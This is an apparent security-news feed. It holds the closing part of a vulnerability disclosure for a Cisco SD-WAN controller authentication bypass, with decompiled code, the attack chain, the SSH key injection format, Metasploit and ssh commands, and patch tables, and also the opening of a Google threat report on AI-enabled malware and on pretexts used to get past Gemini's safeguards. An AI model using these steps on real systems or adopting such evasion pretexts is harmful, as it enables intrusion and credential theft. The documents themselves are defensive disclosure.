return 0LL;                // Success</pre><p>⠀</p><p><span>We can see from the above that the function implements device-type-specific verification through a series of conditional blocks:</span></p><p><span>At [1] above, the function checks whether the connecting peer claims to be a vSmart (type 3) or vManage (type 5). If so, it enters a certificate serial number lookup via </span><span><span data-type="inlineCode">is_serial_duplicate()</span></span><span>, which searches the local certificate database for a matching serial. At [2], if the serial is found, a duplicate-serial check via </span><span><span data-type="inlineCode">vbond_peer_dup_check()</span></span><span> rejects the peer if a peer with that serial is already connected - preventing impersonation of existing authorized controllers.</span></p><p><span>At [3], a second verification block performs full certificate chain verification via </span><span><span data-type="inlineCode">vdaemon_dtls_verify_peer_cert()</span></span><span>. This block executes only for specific (</span><span><span data-type="inlineCode">peer_type</span></span><span>, </span><span><span data-type="inlineCode">local_type</span></span><span>) pairs: vSmart-to-vSmart, vManage-to-vSmart, vManage-to-vManage, vManage-to-vBond, and vSmart-to-vBond. </span><span><strong>No pair in this block involves device type 2 (vHub).</strong></span><span> If the verification function returns a non-zero error, v18 is set to 0, and the function jumps to </span><span><span data-type="inlineCode">LABEL_179</span></span><span>, which  rejects the peer.</span></p><p><span>At [4], vEdge peers (type 1) enter hardware certificate verification via </span><span><span data-type="inlineCode">vdaemon_verify_peer_bidcert()</span></span><span>. This path validates either a hardware TPM-based certificate (for physical vEdge routers) or a virtual edge certificate, including challenge-response signature verification and board ID validation. Failure sends the function to </span><span><span data-type="inlineCode">LABEL_179</span></span><span>, which  rejects the peer.</span></p><p><span>At [5], </span><span><strong>this is the bug</strong></span><span>, there is no “if” block matching a device type of 2 (vHub); the vHub device type simply has no verification code. The function falls through every conditional without entering any of them.</span></p><p><span>At [6], the function unconditionally sets “</span><span><span data-type="inlineCode">*(_BYTE *)(a2 + 70) = 1</span></span><span>”, which is equivalent to ”peer-&gt;authenticated = true”, and returns success. The authenticated flag at peer struct offset 70 is the single bit that gates all subsequent message processing.</span></p><p><span>The following table summarizes the verification applied to each device type:</span></p><p></p><table><colgroup data-width="1252"><col><col><col><col></colgroup><tbody><tr><td><p><span><strong>Device Type </strong></span></p></td><td><p><span><strong>Value </strong></span></p></td><td><p><span><strong>Verification </strong></span></p></td><td><p><span><strong>Result </strong></span></p></td></tr><tr><td><p><span>vEdge</span></p></td><td><p><span>1</span></p></td><td><p><span>HW cert, challenge signature, board ID, OTP</span></p></td><td><p><span>Verified</span></p></td></tr><tr><td><p><span>vHub</span></p></td><td><p><span>2</span></p></td><td><p><span>None</span></p></td><td><p><span>Falls through to “peer-&gt;authenticated = 1”</span></p></td></tr><tr><td><p><span>vSmart</span></p></td><td><p><span>3</span></p></td><td><p><span>Cert chain, serial lookup, duplicate check</span></p></td><td><p><span>Verified</span></p></td></tr><tr><td><p><span>vBond</span></p></td><td><p><span>4</span></p></td><td><p><span>N/A (trust anchor - handled elsewhere)</span></p></td><td><p><span>-</span></p></td></tr><tr><td><p><span>vManage</span></p></td><td><p><span>5</span></p></td><td><p><span>Cert chain, serial lookup, duplicate check</span></p></td><td><p><span>Verified</span></p></td></tr></tbody></table><p>⠀</p><p><span>Therefore, </span><span><strong>a remote unauthenticated attacker can bypass authentication by connecting to the vSmart DTLS port with any self-signed client certificate and claiming to be a vHub (type 2) in the </strong></span><span><span data-type="inlineCode"><strong>CHALLENGE_ACK</strong></span></span><span><strong> message</strong></span><span>. No valid credentials, no CA-signed certificate, and no knowledge of the SD-WAN deployment are required.</span></p><p><span>Looking further at the message dispatcher, we need to confirm that the </span><span><span data-type="inlineCode">CHALLENGE_ACK</span></span><span> message can actually reach </span><span><span data-type="inlineCode">vbond_proc_challenge_ack()</span></span><span>  without prior authentication. The answer is in the pre-dispatch authentication gate in </span><span><span data-type="inlineCode">vbond_proc_msg()</span></span><span>:</span></p><p><span></span></p><pre language="cpp">// vdaemon!vbond_proc_msg()
// Pre-dispatch authentication gate:

if ( *(_BYTE *)(v100 + 70) != 1 // &lt;--- [1]
&amp;&amp; *(_DWORD *)(a3 + 4) != 5      // msg != Hello
&amp;&amp; *(_DWORD *)(a3 + 4) != 8      // msg != CHALLENGE
&amp;&amp; *(_DWORD *)(a3 + 4) != 9      // msg != CHALLENGE_ACK
&amp;&amp; *(_DWORD *)(a3 + 4)           // msg != NEW_CHALLENGE_ACK
&amp;&amp; *(_DWORD *)(a3 + 4) != 10     // msg != CHALLENGE_ACK_ACK
&amp;&amp; *(_DWORD *)(a3 + 4) != 7      // msg != Data
&amp;&amp; *(_DWORD *)(a3 + 4) != 11     // msg != TEAR_DOWN
  // ...snip...
)
{
// ...snip...
    // "Received an unexpected message from an un-authenticated device"
return 20;
}</pre><p>⠀</p><p><span>We can see at [1] above, that the condition is a conjunction of negations: the incoming message is rejected only if the peer is NOT authenticated AND the message type is not one of the pre-authentication allowed types (</span><span><span data-type="inlineCode">CHALLENGE</span></span><span>, </span><span><span data-type="inlineCode">CHALLENGE_ACK</span></span><span>, </span><span><span data-type="inlineCode">NEW_CHALLENGE_ACK</span></span><span>, </span><span><span data-type="inlineCode">CHALLENGE_ACK_ACK</span></span><span>, </span><span><span data-type="inlineCode">Data</span></span><span>, and </span><span><span data-type="inlineCode">TEAR_DOWN</span></span><span>).</span></p><p><span><span data-type="inlineCode">CHALLENGE_ACK</span></span><span> (Message type 9) is explicitly in the allow list, meaning it passes this gate without authentication and reaches the vulnerable </span><span><span data-type="inlineCode">vbond_proc_challenge_ack()</span></span><span>. This is by design; the authentication handshake must be able to proceed before the peer is authenticated.</span></p><p><span>Once the vulnerable </span><span><span data-type="inlineCode">vbond_proc_challenge_ack() </span></span><span>sets “peer-&gt;authenticated = true” via the vHub bypass, the attacker must send a Hello message (Message type 5) to transition the peer to the UP state. The Hello handler has its own secondary authentication check:</span></p><p><span></span></p><pre language="cpp">// Case 5 (Hello) in vbond_proc_msg - line 20362
case 5:
// ...snip...
if ( *(_BYTE *)(v100 + 70) != 1 ) // &lt;--- [2]
{
// "Received an unexpected HELLO from un-authenticated device"
        // ... cleanup and reject ...
return 0LL;
    }
// Process Hello normally - peer transitions to UP</pre><p>⠀</p><p><span>At [2] above, the Hello handler verifies ”peer-&gt;authenticated == true” before processing. After our exploit sets this flag via the vHub bypass, Hello passes this secondary check and the peer transitions to the UP state, a fully trusted control-plane peer.</span></p><p><span>Putting all the pieces together: the attack chain is DTLS handshake (any cert) → receive </span><span><span data-type="inlineCode">CHALLENGE</span></span><span> → send </span><span><span data-type="inlineCode">CHALLENGE_ACK</span></span><span> with device type 2 (vHub) → authentication flag set unconditionally → send Hello → peer transitions to UP.</span></p><p><span>After establishing as an authenticated peer, the attacker has access to the full range of control-plane message types. We identified a particularly impactful post-authentication primitive: persistent SSH key injection via </span><span><span data-type="inlineCode">MSG_VMANAGE_TO_PEER</span></span><span> (Message type 14).</span></p><p><span>The handler for message type 14 is </span><span><span data-type="inlineCode">vbond_proc_vmanage_to_peer()</span></span><span>. Examining the decompiled code:</span></p><p><span></span></p><pre language="cpp">// vdaemon!vbond_proc_vmanage_to_peer()

// ...snip...

stream = fopen("/home/vmanage-admin/.ssh/authorized_keys", "a+"); // &lt;--- [1]
if ( stream )
  {
if ( (unsigned __int8)read_key_data((const char *)(a3 + 32), stream) != 1 &amp;&amp; *(_BYTE *)(a3 + 32) )
    {
if ( dword_241120 &gt; 6 )
        syslog(
191,
"%s[%d]: %%%s-%d: sshkey not present, writing to file",
"vbond_proc_vmanage_to_peer",
2368LL,
          aVdaemonDbgMisc,
7LL);
      fputs((const char *)(a3 + 32), stream); // &lt;--- [2]
}
    fclose(stream);
  }

// ...snip...</pre><p>⠀</p><p><span>At [1] above, the file is opened in append mode - the attacker's key is added alongside any existing authorized keys, avoiding disruption of legitimate access. At [2], the attacker-controlled key buffer from the message body is written directly via fputs() with no sanitization.</span></p><p><span>The key injection message body is a fixed 769-byte structure:</span></p><p></p><table><colgroup data-width="843.1057692307693"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Offset</strong></span></p></td><td><p><span><strong>Size</strong></span></p></td><td><p><span><strong>Field</strong></span></p></td></tr><tr><td><p><span>0-767</span></p></td><td><p><span>768</span></p></td><td><p><span>Key buffer ("\n" + ssh_pubkey + "\n" + "\x00" + zero-padding)</span></p></td></tr><tr><td><p><span>768</span></p></td><td><p><span>1</span></p></td><td><p><span>TLV count = 0</span></p></td></tr></tbody></table><p>⠀⠀</p><p><span>The leading </span><span><span data-type="inlineCode">“\n”</span></span><span> ensures correct appending regardless of whether the existing </span><span><span data-type="inlineCode">authorized_keys</span></span><span> file ends with a newline. The null byte terminates the string for </span><span><span data-type="inlineCode">fputs()</span></span><span>, and the remainder is zero-padded to fill the 768-byte buffer.</span></p><p><span>Any authenticated peer, regardless of device type, can inject SSH keys into the </span><span><span data-type="inlineCode">vmanage-admin</span></span><span> user's </span><span><span data-type="inlineCode">authorized_keys</span></span><span> file on vSmart. The </span><span><span data-type="inlineCode">vmanage-admin</span></span><span> user is a specific internal, high-privileged service account used for automated communication between the management plane (vManage) and the control plane (vSmart/vBond). This converts a transient control-plane peering session into persistent, credential-independent high-privileged access.</span></p><h2>Exploitation</h2><p><span>In this example we will use the exploit developed by Rapid7 Labs and target a Cisco Catalyst SD-WAN Controller which has an IP address of 192.168.80.11. In our example, both the vdaemon service and the NETCONF service are bound to the same interface. The attacker will have an IP address of 192.168.80.130. In our example, the target Cisco Catalyst SD-WAN Controller appliance is running version 20.12.6.1, which was the </span><a href="https://www.cisco.com/c/en/us/td/docs/routers/sdwan/release/notes/controllers-20-12/rel-notes-controllers-20-12.html" target="_blank"><span>latest available version</span></a><span> of the 20.12.* branch at the time of writing.</span></p><p><span>To begin, the attacker loads the module in Metasploit and configures the required options.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt10ac6055852a0df2/6a04b7c97354eb565df0b82f/metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" alt="metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" caption="Figure 1: Metasploit module options for cisco_sdwan_vhub_auth_bypass" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt10ac6055852a0df2/6a04b7c97354eb565df0b82f/metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" data-sys-asset-uid="blt10ac6055852a0df2" data-sys-asset-filename="metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Metasploit module options for cisco_sdwan_vhub_auth_bypass" data-sys-asset-alt="metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Metasploit module options for cisco_sdwan_vhub_auth_bypass</figcaption></div></figure><p>⠀</p><p><span>The module will perform the authentication bypass and then inject an attacker controlled SSH public key into the authorized keys file for the </span><span><span data-type="inlineCode">vmanage-admin</span></span><span> user. The module will generate a new RSA key-pair prior to exploitation, so that the attacker will inject a public key for which they have the corresponding private key.</span></p><p><span>The attacker then sets the target and runs the module.</span></p><p><span></span></p><pre language="shell-session">msf6 auxiliary(admin/networking/cisco_sdwan_vhub_auth_bypass) &gt; set RHOSTS 192.168.80.11
msf6 auxiliary(admin/networking/cisco_sdwan_vhub_auth_bypass) &gt; run</pre><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8e5c072688e3578f/6a04b854c672242154888f52/vhub-authentication-bypass-ssh-key-injection.png" alt="vhub-authentication-bypass-ssh-key-injection.png" caption="Figure 2: Module output showing the vHub authentication bypass and SSH key injection" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="vhub-authentication-bypass-ssh-key-injection.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8e5c072688e3578f/6a04b854c672242154888f52/vhub-authentication-bypass-ssh-key-injection.png" data-sys-asset-uid="blt8e5c072688e3578f" data-sys-asset-filename="vhub-authentication-bypass-ssh-key-injection.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Module output showing the vHub authentication bypass and SSH key injection" data-sys-asset-alt="vhub-authentication-bypass-ssh-key-injection.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 2: Module output showing the vHub authentication bypass and SSH key injection</figcaption></div></figure><p>⠀</p><p><span>The attacker can now SSH into the NETCONF service over TCP port 830 by running the following command (as instructed by the exploit above).</span></p><p><span></span></p><pre language="shell-session">ssh -i /home/cryptocat/.msf4/loot/20260501115947_default_192.168.80.11_cisco.sdwan.sshk_491665.pem vmanage-admin@192.168.80.11 -p 830</pre><p>⠀</p><p><span>SSH public key authentication will succeed, and the attacker will have successfully established a connection to the NETCONF service.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt188407745635ce54/6a04bad8858e72fcb817ab91/ssh-connection-to-NETCONF-service.png" alt="ssh-connection-to-NETCONF-service.png" caption="Figure 3: Successful SSH connection to the NETCONF service as vmanage-admin" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ssh-connection-to-NETCONF-service.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt188407745635ce54/6a04bad8858e72fcb817ab91/ssh-connection-to-NETCONF-service.png" data-sys-asset-uid="blt188407745635ce54" data-sys-asset-filename="ssh-connection-to-NETCONF-service.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Successful SSH connection to the NETCONF service as vmanage-admin" data-sys-asset-alt="ssh-connection-to-NETCONF-service.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: Successful SSH connection to the NETCONF service as vmanage-admin</figcaption></div></figure><p>⠀</p><p><span>At this point the attacker can begin to execute arbitrary NETCONF commands, for example the following “get-config” command can be run by the attacker in the NETCONF session.</span></p><p><span></span></p><pre language="xml">&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"&gt;&lt;capabilities&gt;&lt;capability&gt;urn:ietf:params:netconf:base:1.0&lt;/capability&gt;&lt;/capabilities&gt;&lt;/hello&gt;]]&gt;]]&gt;&lt;rpc message-id="101" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"&gt;&lt;get-config&gt;&lt;source&gt;&lt;running/&gt;&lt;/source&gt;&lt;/get-config&gt;&lt;/rpc&gt;]]&gt;]]&gt;</pre><p>⠀</p><p><span>The output of the </span><span>get-config</span><span> command is shown below.</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5bbb35c1dc9d9a9e/6a04bb39aa1d13b2fbcb537a/NETCONF-get-config-output.png" alt="NETCONF-get-config-output.png" caption="Figure 4: NETCONF get-config output from the compromised controller" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="NETCONF-get-config-output.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5bbb35c1dc9d9a9e/6a04bb39aa1d13b2fbcb537a/NETCONF-get-config-output.png" data-sys-asset-uid="blt5bbb35c1dc9d9a9e" data-sys-asset-filename="NETCONF-get-config-output.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: NETCONF get-config output from the compromised controller" data-sys-asset-alt="NETCONF-get-config-output.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4: NETCONF get-config output from the compromised controller</figcaption></div></figure><p>⠀</p><p><span>The full Metasploit module will be made available on May 27, 2026.</span></p><h2>Remediation</h2><p><span>Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.</span></p><p><span>Customers are advised to upgrade to an appropriate fixed software release as indicated in the Fixed Software section of the Cisco Security Advisory. The following tables indicate the appropriate fixed software releases.</span></p><p></p><table><colgroup data-width="698"><col><col></colgroup><thead><tr><th><p><span><strong>Cisco Catalyst SD-WAN Release</strong></span></p></th><th><p><span><strong>First Fixed Release</strong></span></p></th></tr></thead><tbody><tr><td><p><span>Earlier than 20.9*</span></p></td><td><p><span>Migrate to a fixed release</span></p></td></tr><tr><td><p><span>20.9</span></p></td><td><p><span>20.9.9.1</span></p></td></tr><tr><td><p><span>20.10</span></p></td><td><p><span>20.12.7.1</span></p></td></tr><tr><td><p><span>20.11*</span></p></td><td><p><span>20.12.7.1</span></p></td></tr><tr><td><p><span>20.12</span></p></td><td><p><span>20.12.5.4, 20.12.6.2, 20.12.7.1</span></p></td></tr><tr><td><p><span>20.13*</span></p></td><td><p><span>20.15.5.2</span></p></td></tr><tr><td><p><span>20.14*</span></p></td><td><p><span>20.15.5.2</span></p></td></tr><tr><td><p><span>20.15</span></p></td><td><p><span>20.15.4.4, 20.15.5.2</span></p></td></tr><tr><td><p><span>20.16*</span></p></td><td><p><span>20.18.2.2</span></p></td></tr><tr><td><p><span>20.18</span></p></td><td><p><span>20.18.2.2</span></p></td></tr><tr><td><p><span>26.1.1</span></p></td><td><p><span>26.1.1.1</span></p></td></tr></tbody></table><p><span><em>*These releases have reached the </em></span><a href="https://www.cisco.com/c/en/us/products/routers/sd-wan/eos-eol-notice-listing.html" target="_blank"><span><em>end of software maintenance</em></span></a><span><em>. Cisco strongly encourages customers to upgrade to a </em></span><a href="https://www.cisco.com/c/en/us/td/docs/routers/sdwan/release/notes/compatibility-and-server-recommendations.html" target="_blank"><span><em>supported release</em></span></a><span><em>.</em></span></p><p><br><span>For additional details, please see the vendor </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW" target="_blank"><span>advisory</span></a><span>.</span></p><h2>Vendor statement</h2><p><span><em>"Cisco values the role of the security research community in helping maintain a secure ecosystem and we appreciate the collaboration with Rapid7. We have released a software update to remediate the identified vulnerability. We remain committed to transparent communication and to providing our customers with the robust security and resilience they expect."</em></span></p><h2>Rapid7 customers</h2><p>Exposure Command, InsightVM and Nexpose customers will be able to assess their exposure to CVE-2026-20182 with an authenticated vulnerability check expected to be available in the May 14th, 2026 content release.</p><h2>Credit</h2><p><span>This vulnerability was discovered by Stephen Fewer, Senior Principal Security Researcher, and Jonah Burgess, Senior Security Researcher, both at Rapid7 and is being disclosed in accordance with Rapid7’s </span><a href="https://www.rapid7.com/security/disclosure" target="_self"><span>vulnerability disclosure policy</span></a><span>.</span></p><h2>Disclosure timeline</h2><ul><li><p><span><strong>March 9, 2026:</strong></span><span> Rapid7 makes initial outreach to Cisco who confirms contact the same day. Rapid7 discloses the technical writeup and exploit code to Cisco.</span></p></li><li><p><span><strong>March 11, 2026:</strong></span><span> Cisco confirms receipt of the technical writeup and exploit code and suggests a disclosure date of May 7, 2026.</span></p></li><li><p><span><strong>March 20, 2026:</strong></span><span> Cisco confirms the vulnerability findings, and that a CVE will be reserved.</span></p></li><li><p><span><strong>April 21, 2026:</strong></span><span> Cisco provides reserved CVE identifier and remediation guidance.</span></p></li><li><p><span><strong>April 24, 2026:</strong></span><span> Cisco provides remediation version numbers, alignment on CWE and CVSS scoring, and requests moving disclosure date to May 14.</span></p></li><li><p><span><strong>May 14, 2026:</strong></span><span> This disclosure.</span></p></li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Advanced Packaging: SK Hynix und Mediatek prüfen Intels Emib als Cowos-Alternative]]></title>
<description><![CDATA[Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking ...]]></description>
<link>https://tsecurity.de/de/3511781/it-security-nachrichten/advanced-packaging-sk-hynix-und-mediatek-pruefen-intels-emib-als-cowos-alternative/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3511781/it-security-nachrichten/advanced-packaging-sk-hynix-und-mediatek-pruefen-intels-emib-als-cowos-alternative/</guid>
<pubDate>Tue, 12 May 2026 21:35:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning. E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking ...]]></content:encoded>
</item>
<item>
<title><![CDATA[GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools]]></title>
<description><![CDATA[Executive Summary
Based on recent analysis of the broader threat landscape, Google Threat Intelligence Group (GTIG) has identified a shift that occurred within the last year: adversaries are no longer leveraging artificial intelligence (AI) just for productivity gains, they are deploying novel AI...]]></description>
<link>https://tsecurity.de/de/3504159/it-security-nachrichten/gtig-ai-threat-tracker-advances-in-threat-actor-usage-of-ai-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3504159/it-security-nachrichten/gtig-ai-threat-tracker-advances-in-threat-actor-usage-of-ai-tools/</guid>
<pubDate>Sun, 10 May 2026 08:09:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><h3><span>Executive Summary</span></h3>
<p><span>Based on recent analysis of the broader threat landscape, Google Threat Intelligence Group (GTIG) has identified a shift that occurred within the last year: adversaries are no longer leveraging artificial intelligence (AI) just for productivity gains, they are deploying </span><strong>novel AI-enabled malware in active operations</strong><span>. This marks a new operational phase of AI abuse, involving tools that dynamically alter behavior mid-execution.</span></p>
<p><span>This report serves as an update to our January 2025 analysis, "</span><a href="https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai"><span>Adversarial Misuse of Generative AI</span></a><span>," and details how government-backed threat actors and cyber criminals are integrating and experimenting with AI across the industry throughout the entire attack lifecycle. Our findings are based on the broader threat landscape.</span></p>
<p><span>At Google, we are committed to developing AI responsibly and take proactive steps to disrupt malicious activity by disabling the projects and accounts associated with bad actors, while continuously improving our models to make them less susceptible to misuse. We also proactively share industry best practices to arm defenders and enable stronger protections across the ecosystem. Throughout this report we’ve noted steps we’ve taken to thwart malicious activity, including disabling assets and applying intel to strengthen both our classifiers and model so it’s protected from misuse moving forward. Additional details on how we’re protecting and defending Gemini can be found in this white paper</span><span>, “</span><a href="https://deepmind.google/discover/blog/advancing-geminis-security-safeguards/" rel="noopener" target="_blank"><span>Advancing Gemini’s Security Safeguards</span></a><span>.” </span></p></div>
<div class="block-aside"><dl>
    <dt>aside_block</dt>
    <dd>&lt;ListValue: [StructValue([('title', 'GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools'), ('body', &lt;wagtail.rich_text.RichText object at 0x7f384281d670&gt;), ('btn_text', 'Download now'), ('href', 'https://services.google.com/fh/files/misc/advances-in-threat-actor-usage-of-ai-tools-en.pdf'), ('image', &lt;GAEImage: misuse of AI 2 cover&gt;)])]&gt;</dd>
</dl></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--small
      
      
        h-c-grid__col
        
        
        h-c-grid__col--2 h-c-grid__col--offset-5
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-key.max-1000x1000.png" alt="misuse of AI 2 key">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Key Findings</span></h3>
<ul>
<li aria-level="1">
<p role="presentation"><strong>First Use of "Just-in-Time" AI in Malware:</strong><span> For the first time, GTIG has identified malware families, such as </span><strong>PROMPTFLUX</strong><span> and </span><strong>PROMPTSTEAL</strong><span>, that use Large Language Models (LLMs) during execution. These tools dynamically generate malicious scripts, obfuscate their own code to evade detection, and leverage AI models to create malicious functions on demand, rather than hard-coding them into the malware. While still nascent, this represents a significant step toward more autonomous and adaptive malware.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>"Social Engineering" to Bypass Safeguards:</strong><span> Threat actors are adopting social engineering-like pretexts in their prompts to bypass AI safety guardrails. We observed actors posing as students in a "capture-the-flag" competition or as cybersecurity researchers to persuade Gemini to provide information that would otherwise be blocked, enabling tool development.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Maturing Cyber Crime Marketplace for AI Tooling:</strong><span> The underground marketplace for illicit AI tools has matured in 2025. We have identified multiple offerings of multifunctional tools designed to support phishing, malware development, and vulnerability research, lowering the barrier to entry for less sophisticated actors.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Continued Augmentation of the Full Attack Lifecycle:</strong><span> State-sponsored actors including from North Korea, Iran, and the People's Republic of China (PRC) continue to misuse Gemini to enhance all stages of their operations, from reconnaissance and phishing lure creation to command and control (C2) development and data exfiltration.</span></p>
</li>
</ul>
<h3><span>Threat Actors Developing Novel AI Capabilities </span></h3>
<p><span>For the first time in 2025, GTIG discovered a code family that employed AI capabilities mid-execution to dynamically alter the malware’s behavior. Although some recent implementations of novel AI techniques are experimental, they provide an early indicator of how threats are evolving and how they can potentially integrate AI capabilities into future intrusion activity. Attackers are moving beyond "vibe coding" and the baseline observed in 2024 of using AI tools for technical support. We are only now starting to see this type of activity, but expect it to increase in the future.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Malware</strong></p>
</td>
<td>
<p><strong>Function</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>Status</strong></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.virustotal.com/gui/file/f8f5e0440c57c7deffd75ca33e2511867039796aa803e7ef847396a379188a7d" rel="noopener" target="_blank"><span>FRUITSHELL</span></a></p>
</td>
<td>
<p><span>Reverse Shell</span></p>
</td>
<td>
<p><span>Publicly available reverse shell written in PowerShell that establishes a remote connection to a configured command-and-control server and allows a threat actor to execute arbitrary commands on a compromised system. Notably, this code family contains hard-coded prompts meant to bypass detection or analysis by LLM-powered security systems.</span></p>
</td>
<td>
<p><span>Observed in operations</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.virustotal.com/gui/file/eb0687daed29f3651c61b0a2aa4a0cdcf2049a1ebae2e15e2dd9326471d318a1" rel="noopener" target="_blank"><span>PROMPTFLUX</span></a></p>
</td>
<td>
<p><span>Dropper</span></p>
</td>
<td>
<p><span>Dropper written in VBScript that decodes and executes an embedded decoy installer to mask its activity. Its primary capability is regeneration, which it achieves by using the Google Gemini API. It prompts the LLM to rewrite its own source code, saving the new, obfuscated version to the Startup folder to establish persistence. PROMPTFLUX also attempts to spread by copying itself to removable drives and mapped network shares.</span></p>
</td>
<td>
<p><span>Experimental</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.virustotal.com/gui/file/e24fe0dd0bf8d3943d9c4282f172746af6b0787539b371e6626bdb86605ccd70" rel="noopener" target="_blank"><span>PROMPTLOCK</span></a></p>
</td>
<td>
<p><span>Ransomware</span></p>
</td>
<td>
<p><span>Cross-platform ransomware written in Go, identified as a proof of concept. It leverages an LLM to dynamically generate and execute malicious Lua scripts at runtime. Its capabilities include filesystem reconnaissance, data exfiltration, and file encryption on both Windows and Linux systems.</span></p>
</td>
<td>
<p><span>Experimental</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.virustotal.com/gui/file/766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777" rel="noopener" target="_blank"><span>PROMPTSTEAL</span></a></p>
</td>
<td>
<p><span>Data Miner</span></p>
</td>
<td>
<p><span>Data miner written in Python and packaged with PyInstaller. It contains a compiled script that uses the Hugging Face API to query the LLM Qwen2.5-Coder-32B-Instruct to generate one-line Windows commands. Prompts used to generate the commands indicate that it aims to collect system information and documents in specific folders. PROMPTSTEAL then executes the commands and sends the collected data to an adversary-controlled server.</span></p>
</td>
<td>
<p><span>Observed in operations</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.virustotal.com/gui/file/8eea1f65e468b515020e3e2854805f1ef5c611342fa23c4b31d8ed3374286a90" rel="noopener" target="_blank"><span>QUIETVAULT</span></a></p>
</td>
<td>
<p><span>Credential Stealer</span></p>
</td>
<td>
<p><span>Credential stealer written in JavaScript that targets GitHub and NPM tokens. Captured credentials are exfiltrated via creation of a publicly accessible GitHub repository. In addition to these tokens, QUIETVAULT leverages an AI prompt and on-host installed AI CLI tools to search for other potential secrets on the infected system and exfiltrate these files to GitHub as well.</span></p>
</td>
<td>
<p><span>Observed in operations</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 1: Overview of malware with novel AI capabilities GTIG detected in 2025</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Experimental Malware Using Gemini for Self-Modification to Evade Detection</span></h4>
<p><span>In early June 2025, GTIG identified experimental dropper malware tracked as PROMPTFLUX that suggests threat actors are experimenting with LLMs to develop dynamic obfuscation techniques. PROMPTFLUX is written in VBScript and interacts with Gemini's API to request specific VBScript obfuscation and evasion techniques to facilitate "just-in-time" self-modification, likely to evade static signature-based detection.</span></p>
<p><span>Further examination of PROMPTFLUX samples suggests this code family is currently in a development or testing phase since some incomplete features are commented out and a mechanism exists to limit the malware's Gemini API calls. The current state of this malware does not demonstrate an ability to compromise a victim network or device. We have taken action to disable the assets</span><strong> </strong><span>associated with this activity. </span></p>
